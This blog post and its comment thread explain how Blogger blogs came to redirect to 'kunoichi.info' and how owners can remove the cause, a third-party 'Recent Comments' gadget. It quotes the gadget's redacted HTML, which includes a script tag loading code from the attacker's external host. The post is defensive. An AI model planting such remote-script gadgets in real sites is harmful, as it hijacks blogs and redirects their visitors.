Skip to main content

Blogger Blogs Redirecting To "kunoichi . info"

In the latest round of blog hijacks, from misbehaving or miswritten accessory gadgets, we have reports this month in Blogger Help Forum: Something Is Broken about blogs redirecting to "kunoichi . info".
My Blogger site, xxxxxxx . blogspot . com, with over 8 years of blog posts archived, has been redirected without my permission, to "kunoichi . info". I see my blog for a few seconds before it goes to the new site.

If we use a text only browser, such as an HTTP trace utility, the offending code is directly visible. Here's an example, taken from the latest forum problem report (and rigourously redacted).

<div class='widget HTML' id='HTML2'>
<h2 class='title'>Recent Comments</h2>
<div class='widget-content'>
<script style="text/javascript" src="http : // kunoichi . info / blogger _ buster / comments.js"></script><script style="text/javascript">var a_rc=5;var m_rc=true;var n_rc=true;var o_rc=100;</script><script src="http : // xxxxxxx . blogspot . com /feeds/comments/default?alt=json-in-script&callback=showrecentcomments"></script>

So far, identification and removal, of the problem code, seems to be straightforward - just access the "Page Elements" wizard (Classic Blogger GUI) or the "Layout" menu wizard (New Blogger GUI), find the offending gadget, and remove it. As always, you are advised to clear cache and restart the browser, after removal and before testing.

>> Top

Comments

Andrejs said…
Thanks. Just ran into this issue. In case someone runs into a similar problem. Couldn't find it in the Layout GUI for a while. Then stumbled across it when I edited the comments gadget.
Jennifer said…
Hey, thanks. My blog is dormant as far as new posts, but I do go back to it to look at older things now and then. My BF discovered it had the Kunoichi redirect problem, and I found your post by Googling "blog hijacked to kunoichi.info".

Your solution worked, and all is now well. What I would like to know is, how did the code get in there in the first place?

In any case, thanks for the solution!
Jennifer
Chuck Croll said…
Jennifer,

You probably deleted a very useful sounding gadget - typically the problem will be in "Recent Comments" / "Recent Posts" or maybe "Daily Calendar". When initially installed, the gadget will work just fine.

What the hacker did is write the code, that you installed on your blog, so it references his personal code library. After his hacked gadgets had been installed by thousands of blog owners, the hacker updated his code, and it now redirects to "kunoichi . info".

In a similar case, the hacker is advising people to read his blog. The article on his blog instructs people to remove the "bad" gadgets, and get updated gadgets from his personal library - not Google hosted.

In effect, this guy is using the Google code library to advertise his personal expertise as a hacker.

We have had this exploit twice, in the past. The first time, it took us like 6 months before we noticed a pattern - and we had hundreds of problem reports in the forums, when the gadgets matured. The second time, we knew what to look for - and this time, we were ready for the attack.

http://blogging.nitecruzr.net/search/label/Blog%20Hijack%20-%202010
Jennifer said…
Ah, okay, that makes sense.

In my case, it was "Recent Comments," so I had wondered if someone had left the code in a comment, which was then displayed on the page, causing the problem.

Your explanation makes more sense, though - for the text of a comment to be able to hijack a blog would be a pretty big security hole!

In any case, it's gone and now I know it won't happen again. Thanks!
Cindee said…
Thank you SO much for the fix. I had no idea what to do. You responded so quickly too. Thanks again!!
Thanks a lot I just recovered my blog using ur help
Globus said…
good post, which globus found useful. thanks.
Chuck Croll said…
Globus,

You will be at the end of a very long line.

Popular posts from this blog

Custom Domain Migration - Managing The Traffic

Your blog depends upon traffic for its success.

Anything that affects the traffic to your blog, such as any change in the URL, affects the success of your blog. Publishing the blog to a custom domain, like renaming the blog, will affect traffic to your blog. The effects of the change will vary from blog to blog, because of the different traffic to every different blog.Followers. People who find your blog because of recommendations by other people.Search engines. Robotic processes which methodically surf your blog, and provide dynamic indexing to people who search for information.Subscribers. People who read your content from their newsfeed reader, such as the dashboard Reading List.Viewers. People who read your content from their browser.No two blogs are the same - and no two blogs will have the same combinations of traffic sources.

Stats Components Are Significant, In Their Own Context

One popular Stats related accessory, which displays pageview information to the public, is the "Popular Posts" gadget.

Popular Posts identifies from 1 to 10 of the most popular posts in the blog, by comparing Stats pageview counts. Optional parts of the display of each post are a snippet of text, and an ever popular thumbnail photo.

Like many Stats features, blog owners have found imaginative uses for "Popular Posts" - and overlook the limitations of the gadget. Both the dynamic nature of Stats, and the timing of the various pageview count recalculations, create confusion, when Popular Posts is examined.